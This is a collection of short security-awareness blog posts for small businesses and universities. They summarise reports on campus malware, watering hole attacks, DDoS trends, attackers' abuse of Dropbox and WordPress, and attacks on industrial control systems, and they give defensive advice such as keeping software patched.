Dark Reading reports that universities are 300% more likely to have malware on their networks than their commercial and public sector counterparts. Given the lack of standards or hard-to-enforce standards for many of the users on campus networks, this is not a huge surprise. The academic culture of share-share-share (with some exceptions) can also contribute to this high malware prevalence. For many students and faculty, complying with a directive or guidance can be synonymous to bending down before The Man.
The Expiro family of malware is particularly prevalent in higher education. The Expiro family of malware:
- infects drives of all types — local, portable, network
- installs malicious extensions to Chrome and FireFox browsers
- attacks via web site visit “drive-bys”
- activity includes copying/stealing user names, passwords, and web histories
I don’t see top down authoritative approaches to ever to enhance security on campus. It just won’t fly. But that doesn’t mean don’t bother either. Core efforts to enhance security on campus need to include a robustly managed wired and wireless network backbone (what’s behind the wall), a lot of trust building effort with students, faculty, and staff, and a lot of education and accessible (easy to implement) guidance. This requires time and staffing (ie $$), but it is the best opportunity to tame higher ed malware rates.
The biggest innovation in targeted attacks by malicious actors in the past year is in what is called Watering Hole Attacks, according to the Symantec Internet Security Threat Report 2013.
A Watering Hole Attack is indirect in that instead of attacking the target directly, malicious code is placed on sites that the target is known to visit. According to Threatpost, watering hole attacks have been “used primarily by state-sponsored attackers to spy on rival governments, dissident citizen groups and manufacturing organizations.” Two popular watering hole attacks in the past year have been on the Department of Labor and on the Council of Foreign Relations website. Watering hole attacks have also been used on Facebook, Apple, and Twitter users when malicious code was inserted on a popular iPhone software development site.
How it works:
Watering hole attacks have multiple phases in their implementation:
- Victims/targets are researched and profiled to identify what sites that group (or individual) visit or are likely to visit.
- Those identified websites are tested for vulnerabilities
- Malicious code is injected on these sites
- At this point, the “watering hole” site is infected and ready to deliver malicious code to the targeted visitor when they appear.
- Upon visiting an infected site, the targeted visitor is redirected to another site where a separate bit of malicious code is downloaded onto the user’s computer. At this point, the attacker has control of the targeted user’s computer.
One of the reasons that watering hole attacks are effective is that, in many cases, the watering hole website — that has been infected and is waiting to download malicious code — cannot be “blacklisted” because it is a legitimate site and needs to be operational. An example is the Department of Labor site. The site needs to remain available.
What to do:
The primary activity that SMB’s can do to reduce the risk of watering hole attacks is to keep software current, aka “patched.”. For example, on user computers running Windows, allow Windows to auto update its operating system. Larger companies might have the resources to employ network analysis and detection as well as data analytics to mitigate the watering hole attack. However, as we know, the expertise, staffing, and time for this sort of activity is typically not available to SMB’s.
What work-related (or non-work-related) websites do you or your employees visit?
Jeff Wilson with Infonetics Research suggests that attack motivations include:
- politically motivated
- state-sponsored electronics warfare
- social activism
- organized crime
- general mischief
- more than 2500 DDOS attacks per day
- over 1100 botnets active as of end of July
- duration of attack trending down — 86% < 1 hr
Network Computing suggests that reasons for increased attack size stem from:
- increased capability of hosts (faster computers)
- many more highly effective botnets are active
- businesses have higher capacity, so attacks need higher capacity in order to execute an effective DDOS attack
Cloud services and social media services are often touted as a way for Small to Medium-sized Businesses (SMB’s) to manage their IT needs, information risk, and information security needs. While there is real potential for SMB’s in this space, it is not without risk. As an example, CyberSquared has documented increasing use of attackers using trusted cloud services such as Dropbox & WordPress to manage aspects of an attack.
Sophisticated, Chained Multi-component Attacks
A recent attack had these sophisticated components:
- A Word document with embedded malicious content that would attempt to activate upon opening.
- The content of the Word document was relevant to the recipients of the attack. In this case it appears to be a policy document for the Association of Southeast Asian Nations (ASEAN). That is, it’s a document that targeted recipients would likely be interested in opening.
- There was also evidence that the Word document was a product/artifact of an earlier attack. That is, data/documents/information collected/stolen from earlier attacks are used as components and tools for future attacks.
- The document was put in a Dropbox account created quickly and at no charge by the attacker.
- The attacker then emailed the Dropbox account info to the targeted recipients.
- Now for some extra sneakiness — note that the file says that it’s a zipped (compressed file) with the .zip extension. Upon opening, researchers saw that it used a fake Adobe pdf icon to cover up the fact that it was actually a Word document (that had the malicious code).
- Once a user received this Dropbox link and opened the compressed-faux-pdf-actual-malicious-Word-doc file, the next phase would start. From here the malicious code would then contact a WordPress site to get Command & Control information so that it could get specific instructions to further its attack.
- Note IP address and port information embedded in an otherwise seemingly innocuous post.
Advantages of a Trusted Public Service to Attackers
- Attackers can hide behind a trusted brand name such as Dropbox, WordPress, or Twitter
- Ease of attacker anonymity stems from ease of account set up
- Attackers able to use cloud service infrastructure to target victims, eg using Dropbox email component to reach out
- Malicious content easily bypasses old school detection mechanisms
This is some pretty sneaky stuff embedded into some trusted services that often market directly to SMB’s. I’m not saying don’t use them — they do offer huge convenience and direct cost savings. However, it is critical to recognize that they don’t offer a slam-dunk solution for security. Indeed, no solution offers this. Like everything else, reflection on risk needs to occur to ensure an SMB has the best chance for good decisions.
ICS attacks by business sector
— ICS-CERT responds to over 200 Industrial Control System (ICS) incidents between October 2012 and May 2013.
— Highest percentage in energy sector — 53%
— Critical Manufacturing sector follows — 17%
ICS attacks by source country
— TrendMicro research emulates Industrial Control System with honeypots
— Only takes 18 hours for first honey pot to be attacked
— Over 28 days, 39 attacks from 14 countries
— Of 39 attacks, 12 were unique and considered ‘targeted’
— Attackers demonstrated experience & expertise with ModBus industrial control protocol
from Symantec Intelligence Report June 2012 (via InfoWeek & DarkReading)
Symantec Intelligence Reports